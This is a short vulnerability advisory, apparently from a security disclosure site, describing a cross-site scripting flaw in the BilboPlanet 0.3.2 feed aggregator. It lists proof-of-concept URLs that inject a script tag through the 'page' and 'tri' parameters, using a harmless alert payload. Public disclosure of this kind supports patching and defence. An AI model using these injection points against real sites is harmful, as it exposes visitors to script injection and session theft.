BilboPlanet 0.3 Persistent XSS Vulnerability

2010.07.27
Credit: Metropolis
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################################### # # Script Name : BilboPlanet 0.3.2 # # Version : 0.3.2 # # Bug Type : Persistent XSS Vulnerability # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 26/07/2010 # # Download app : http://www.bilboplanet.com/downloads/bilboplanet-0.3.2.tar.gz # # Description: # # In online media, Planet is a feed aggregator application designed to collect posts from the weblogs of members of an Internet community and display them on a single page. # Planet runs on a web server. It creates pages with entries from the original feeds in chronological order, most recent entries first. # BilboPlanet is an Open Source RSS feed aggregator written in PHP. # ########################################### PoC : http://[target]/[path]/?page=1[XSS] http://[target]/[path]/index.php?page=1[XSS] http://[target]/[path]/?tri=day&page=1[XSS] local Example : http://localhost/bilboplanet/?page=1"><script>alert(31337);</script> http://localhost/bilboplanet/index.php?page=1"><script>alert(31337);</script> http://localhost/bilboplanet/?tri=day&page=1"><script>alert(31337);</script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top